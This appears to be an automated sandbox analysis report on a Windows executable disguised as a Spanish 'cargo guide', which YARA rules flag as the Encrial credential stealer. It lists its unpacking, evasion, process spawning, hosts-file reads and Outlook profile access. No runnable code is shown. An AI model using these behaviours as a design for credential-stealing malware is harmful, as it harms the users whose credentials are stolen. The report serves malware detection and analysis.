              Source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040312A
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_004063541_2_00406354
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_004048021_2_00404802
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00406B2B1_2_00406B2B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333BA951_2_7333BA95
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333BA861_2_7333BA86
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0040A2A52_2_0040A2A5
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047F34302_2_047F3430
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047F85702_2_047F8570
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FE6E82_2_047FE6E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047F50702_2_047F5070
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FE28B2_2_047FE28B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FD3082_2_047FD308
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FBE7F2_2_047FBE7F
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FDE292_2_047FDE29
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FD9C82_2_047FD9C8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047F4A482_2_047F4A48
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FCA0E2_2_047FCA0E
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FEB4B2_2_047FEB4B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FD2FB2_2_047FD2FB
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FB3A02_2_047FB3A0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FB3902_2_047FB390
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05809DA02_2_05809DA0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580D1C02_2_0580D1C0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580F5C02_2_0580F5C0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05800DE82_2_05800DE8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580A1F82_2_0580A1F8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580C9102_2_0580C910
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058099482_2_05809948
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580CD682_2_0580CD68
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058090982_2_05809098
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580C4B82_2_0580C4B8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058094F02_2_058094F0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580BC082_2_0580BC08
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05808C402_2_05808C40
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580C0602_2_0580C060
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058083902_2_05808390
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580B7B02_2_0580B7B0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058087E82_2_058087E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580AF002_2_0580AF00
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058053082_2_05805308
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580B3582_2_0580B358
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580AAA82_2_0580AAA8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580DEC82_2_0580DEC8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580D6182_2_0580D618
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580A6502_2_0580A650
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580DA702_2_0580DA70
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05809D932_2_05809D93
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580D1B02_2_0580D1B0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05800DE22_2_05800DE2
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580A1E92_2_0580A1E9
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580C9002_2_0580C900
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580F5192_2_0580F519
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580993C2_2_0580993C
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058049502_2_05804950
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580CD582_2_0580CD58
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058049602_2_05804960
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580908B2_2_0580908B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580C4AC2_2_0580C4AC
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058094E32_2_058094E3
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05808C302_2_05808C30
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580C0532_2_0580C053
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580B7A12_2_0580B7A1
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058087D92_2_058087D9
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580BBFC2_2_0580BBFC
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580B34B2_2_0580B34B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580837F2_2_0580837F
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580AA9B2_2_0580AA9B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580AEF32_2_0580AEF3
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580D60B2_2_0580D60B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580A6402_2_0580A640
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0580DA632_2_0580DA63
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058245882_2_05824588
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058265482_2_05826548
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058284C82_2_058284C8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058234002_2_05823400
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058297B82_2_058297B8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058256E82_2_058256E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058226F82_2_058226F8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058271E82_2_058271E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058241302_2_05824130
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058291682_2_05829168
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058210B82_2_058210B8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058203B82_2_058203B8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058252902_2_05825290
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058222A02_2_058222A0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05823CD82_2_05823CD8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05822FA82_2_05822FA8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05829E002_2_05829E00
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05821E202_2_05821E20
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05824E382_2_05824E38
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05827E782_2_05827E78
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058249E02_2_058249E0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058278302_2_05827830
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058238582_2_05823858
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05826B982_2_05826B98
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05828B182_2_05828B18
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05825B402_2_05825B40
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_05822B502_2_05822B50
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058265372_2_05826537
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0582457C2_2_0582457C
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_058284B82_2_058284B8
              Source: GU#U00cdA DE CARGA...exe, 00000001.00000003.260420482.000000000EAFF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GU#U00cdA DE CARGA...exe
              Source: GU#U00cdA DE CARGA...exe, 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStubV4.exeR vs GU#U00cdA DE CARGA...exe
              Source: GU#U00cdA DE CARGA...exeBinary or memory string: OriginalFilename vs GU#U00cdA DE CARGA...exe
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameStubV4.exeR vs GU#U00cdA DE CARGA...exe
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.521805997.0000000000197000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs GU#U00cdA DE CARGA...exe
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile read: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeJump to behavior
              Source: GU#U00cdA DE CARGA...exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe 'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe'
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess created: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe 'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe'
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess created: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe 'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe' Jump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile created: C:\Users\user\AppData\Local\Temp\nsp29F7.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/2
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar,1_2_00402053
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_004042C1
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_00401489
              Source: GU#U00cdA DE CARGA...exeString found in binary or memory: F-Stopw
              Source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, ?u07fb?ufffd?/u06e8??u0097u005e.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: wntdll.pdbUGP source: GU#U00cdA DE CARGA...exe, 00000001.00000003.265170689.000000000E9E0000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: GU#U00cdA DE CARGA...exe, 00000001.00000003.265170689.000000000E9E0000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeUnpacked PE file: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeUnpacked PE file: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
              Detected unpacking (creates a PE file in dynamic memory)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeUnpacked PE file: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00401F16 push ecx; ret 2_2_00401F29
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile created: C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dllJump to dropped file
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess information queried: ProcessInformationJump to behavior
